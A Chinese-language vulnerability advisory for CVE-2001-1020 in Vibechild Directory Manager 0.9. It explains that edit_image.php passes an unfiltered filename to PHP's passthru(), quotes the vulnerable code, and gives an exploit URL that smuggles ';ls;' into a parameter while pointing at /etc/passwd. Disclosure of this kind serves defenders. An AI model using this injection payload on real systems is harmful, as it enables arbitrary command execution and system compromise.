添加时间:
2005-08-11

系统编号:
WAVDB-00055
BugCVE: CVE-2001-1020
BUGTRAQ: 3288

影响版本:
Vibechild Directory Manager 0.9

程序介绍:

Directory Manager是用于维护LDAP目录数据的应用程序，是由Vibechild维护的，可以从Sourceforge.net下载。

漏洞分析:

发现Directory Manager中的一个脚本没有过滤用户输入的元字符，而直接把用户的输
入传递给PHP的passthru()函数，这可能导致攻击者以HTTPD权限执行任意代码。

这可能会导致系统敏感信息的泄露或控制整个系统。

问题出在下列代码中：

edit_image.php :

if( !$dn ) Header(  Location: $defaultpage  );
...
if( is_file( $userfile ) && $userfile_name )
    {
    if( copy( $userfile,  /tmp/  . $userfile_name ) )
        {
    ...
        passthru(  /usr/bin/convert -scale 600x600 /tmp/$userfile_name /tmp/$userfile_name.jpg  );
    ...
    unlink(  /tmp/$userfile_name.jpg  );

例如，如果设置$userfile_name为;ls;就可能执行ls命令。

漏洞利用:

http://victim.host/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20

解决方案:
厂商补丁：
Vibechild Directory Manager
-----------------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://sourceforge.net/projects/directorymanage/

信息来源:
<*来源：Karol Wiesek （appelast@cdp.pl）
链接：http://archives.neohapsis.com/archives/bugtraq/2001-09/0013.html
*>